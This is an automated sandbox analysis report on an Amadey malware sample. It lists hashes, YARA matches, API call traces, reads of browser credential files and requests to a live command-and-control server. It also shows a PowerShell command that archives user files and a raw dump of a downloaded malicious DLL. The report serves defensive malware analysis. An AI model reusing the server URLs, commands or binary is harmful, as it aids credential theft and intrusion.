Summary | ZeroBOX

madey.exe

Amadey Generic Malware Malicious Library Antivirus UPX Malicious Packer PE File PE64 DLL OS Processor Check PE32
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 16, 2024, 11:06 a.m. Oct. 16, 2024, 11:11 a.m.
Size 549.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 689ff816fc3db38894e81abbdf63c02b
SHA256 f2ebbd96f7cf19aa8cc8b1273d1f80169de93ac4dde951ff4547177a11010945
CRC32 4E09271A
ssdeep 12288:MzW5JeQqp6xEWEoiH5KlCrX4FZg40rvM1BCpkLDapAGEhoCXOfNw9lu+eqQoEzwz:MzWCKlCroFWHr6BCCXau7X3pP7
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • Malicious_Packer_Zero - Malicious Packer
  • IsPE32 - (no description)
  • Generic_Malware_Zero - Generic Malware
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
78.153.139.168 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000414b20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7a90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7a90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7a90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7d30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7d30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7b00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7b00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7b00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7b00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7fd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7fd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7fd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7fd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7fd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7fd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7b00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7b00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7b00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7b00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7b00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7b00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7b00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7b00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7ef0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7ef0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b7ef0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b8510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b8510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b8580
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b8580
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b8510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b8510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b8510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003f6a90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003f6a90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003f6a90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003f6a90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000048bf20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000048bf20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000048c1c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000000048c1c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b8350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b8350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b8350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b0b8350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\Path
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://78.153.139.168/gfj38cHcw/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://78.153.139.168/gfj38cHcw/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://78.153.139.168/gfj38cHcw/Plugins/clip64.dll
request POST http://78.153.139.168/gfj38cHcw/index.php
request GET http://78.153.139.168/gfj38cHcw/Plugins/cred64.dll
request GET http://78.153.139.168/gfj38cHcw/Plugins/clip64.dll
request POST http://78.153.139.168/gfj38cHcw/index.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1708
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ff0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1236
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000006530000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002490000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000025b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1de1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef205e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef205e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef205f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef205f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef205f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef205f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef205f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef205f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef205f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef205f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2060000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2060000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2060000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2060000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2060000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2061000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2061000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2061000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2061000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef205e000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00022000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000025b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000025b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00122000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000fd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00170000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00023000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00123000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0002a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal
file C:\Users\test22\AppData\Local\Chromium\User Data\Default\Login Data
file C:\Users\test22\AppData\Roaming\0560249ade67ec\cred64.dll
file C:\Users\test22\AppData\Roaming\0560249ade67ec\clip64.dll
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -Command Compress-Archive -Path 'C:\Users\test22\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\test22\AppData\Local\Temp\832866432405_Desktop.zip' -CompressionLevel Optimal
file C:\Users\test22\AppData\Local\Temp\76c5995d57\Gxtuum.exe
file C:\Users\test22\AppData\Roaming\0560249ade67ec\clip64.dll
file C:\Users\test22\AppData\Local\Temp\76c5995d57\Gxtuum.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\76c5995d57\Gxtuum.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\76c5995d57\Gxtuum.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\0560249ade67ec\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\0560249ade67ec\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÆÞÉ ‚¿§^‚¿§^‚¿§^Ù×£_‘¿§^Ùפ_’¿§^Ù×¢_2¿§^WÒ¢_Ä¿§^WÒ£_¿§^WÒ¤_‹¿§^Ùצ_¿§^‚¿¦^C¿§^Ñ®_†¿§^ѧ_ƒ¿§^ÑX^ƒ¿§^Ñ¥_ƒ¿§^Rich‚¿§^PEd†ùxgð" ¼TÈ €P`@‰X˜‰Œ ø`p­0ôОp@ŸÐè.text¨º¼ `.rdataÎÐÐÀ@@.data¬» D@À.pdatap­`®Ô@@_RDATA”‚@@.rsrcø „@@.relocô0†@BHƒì(A¸ H§nH à»è3 H lHƒÄ(é/í ÌÌÌHƒì(A¸ HŸnH ðÂè H ¬HƒÄ(éÿì ÌÌÌHƒì(A¸H“nH àÃèÓ H ìHƒÄ(éÏì ÌÌÌHƒì(A¸ HonH 0½è£ H ,€HƒÄ(éŸì ÌÌÌHƒì(A¸HgnH Âès H l€HƒÄ(éoì ÌÌÌHƒì(A¸HOnH 0ºèC H ¬€HƒÄ(é?ì ÌÌÌHƒì(E3ÀHÂÏH ÃÂè H ï€HƒÄ(éì ÌÌÌÌÌÌHƒì(E3ÀH’ÏH 3Ãèæ H /HƒÄ(éâë ÌÌÌÌÌÌHƒì(E3ÀHbÏH c¼è¶ H oHƒÄ(é²ë ÌÌÌÌÌÌHƒì(E3ÀH2ÏH ó¸è† H ¯HƒÄ(é‚ë ÌÌÌÌÌÌHƒì(A¸HmH À¹èS H ìHƒÄ(éOë ÌÌÌHƒì(A¸H_mH ÐÅè# H ,‚HƒÄ(éë ÌÌÌHƒì(A¸H?mH `Áèó H l‚HƒÄ(éïê ÌÌÌHƒì(A¸HmH p·èà H ¬‚HƒÄ(é¿ê ÌÌÌHƒì(A¸$HÿlH  ¹è“ H ì‚HƒÄ(éê ÌÌÌHƒì(A¸H÷lH PÂèc H ,ƒHƒÄ(é_ê ÌÌÌHƒì(A¸HßlH `ºè3 H lƒHƒÄ(é/ê ÌÌÌHƒì(A¸ HÏlH p½è H ¬ƒHƒÄ(éÿé ÌÌÌHƒì(A¸H¯lH `½èÓ H ìƒHƒÄ(éÏé ÌÌÌHƒì(A¸HlH p¼è£ H ,„HƒÄ(éŸé ÌÌÌHƒì(A¸HwlH ¿ès H l„HƒÄ(éoé ÌÌÌHƒì(A¸ HWlH пèC H ¬„HƒÄ(é?é ÌÌÌHƒì(A¸LH?lH  ºè H ì„HƒÄ(éé ÌÌÌHƒì(A¸H_lH 0¶èã H ,…HƒÄ(éßè ÌÌÌHƒì(A¸dHOlH Ãè³ H l…HƒÄ(é¯è ÌÌÌHƒì(A¸H‡lH ð¿èƒ H ¬…HƒÄ(éè ÌÌÌHƒì(A¸HolH ½èS H ì…HƒÄ(éOè ÌÌÌHƒì(A¸ H_lH °µè# H ,†HƒÄ(éè ÌÌÌHƒì(A¸ H?lH ¾èó H l†HƒÄ(éïç ÌÌÌHƒì(A¸(HlH ¼èà H ¬†HƒÄ(é¿ç ÌÌÌHƒì(A¸ HlH `Àè“ H ì†HƒÄ(éç ÌÌÌHƒì(A¸ HÿkH Ãèc H ,‡HƒÄ(é_ç ÌÌÌHƒì(A¸HßkH €½è3 H l‡HƒÄ(é/ç ÌÌÌHƒì(A¸H¿kH 0Àè H ¬‡HƒÄ(éÿæ ÌÌÌHƒì(A¸ H¯kH ¹èÓ H ì‡HƒÄ(éÏæ ÌÌÌHƒì(A¸,HkH Pºè£ H ,ˆHƒÄ(éŸæ 